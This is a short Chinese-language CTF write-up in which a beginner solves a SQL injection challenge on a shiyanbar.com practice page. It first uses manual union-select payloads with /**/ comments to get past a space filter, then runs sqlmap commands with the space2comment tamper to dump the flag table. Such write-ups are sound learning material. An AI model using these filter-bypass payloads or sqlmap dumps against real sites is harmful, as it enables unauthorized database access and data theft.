第二天sql注入,还是一只小白。。。
一、
1、首先输入1,没啥结果
data:image/s3,"s3://crabby-images/20e93/20e93f601b1cbdbb1bd312dd4695ea6c6c54e561" alt=""
2、输入1',和上面一样
3、输入1 '(加了空格),被禁止,于是空格不过
data:image/s3,"s3://crabby-images/636ec/636ece806f968cc5ed9086e12c4820ca781aaef3" alt=""
4、输入'or'1,出现不知道的东西
data:image/s3,"s3://crabby-images/2ac63/2ac6373909d1af83d371a743f13840cf8e0800f4" alt=""
5、database()被和谐了,直接查全部
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
data:image/s3,"s3://crabby-images/035cc/035cce5143db6588e0fb4aa61a9accb5a20aa8c5" alt=""
6、接下来查表
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
data:image/s3,"s3://crabby-images/51f2b/51f2b68dc5333f8adf2e0dcd07533ade52d797ad" alt=""
7、字段
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1
data:image/s3,"s3://crabby-images/a4480/a44804e72cd89e63bbe27afecf5c2acfa30145ff" alt=""
8、值
1'/**/union/**/select/**/flag/**/from/**/flag/**/where'1'='1
data:image/s3,"s3://crabby-images/5a433/5a43344401a2d412783556316116c287d8f1d050" alt=""
(有一个神奇的地方是上次各种双写这次没有,还有一个是上次'后面有一个空格这次也没有)
二、接下来上sqlmap吧,接4
1、跳双写,查库
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment --dbs
data:image/s3,"s3://crabby-images/05685/056854ea14696d8eddf833659daab80ec39c67e8" alt=""
2、知库查表
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 --tables
data:image/s3,"s3://crabby-images/0a8e1/0a8e1f1bad0a68ca38a5962bdc02261988038784" alt=""
3、知库、表,查字段
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag --columns
data:image/s3,"s3://crabby-images/9dc52/9dc52d6720922e662ff4624a1b7e7e38023746a5" alt=""
4、知库、表、字段,查值
sqlmap -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag -C flag --dump
data:image/s3,"s3://crabby-images/075c0/075c0623dca1a10e4308197a4667d4ea679bab00" alt=""
完成
网友评论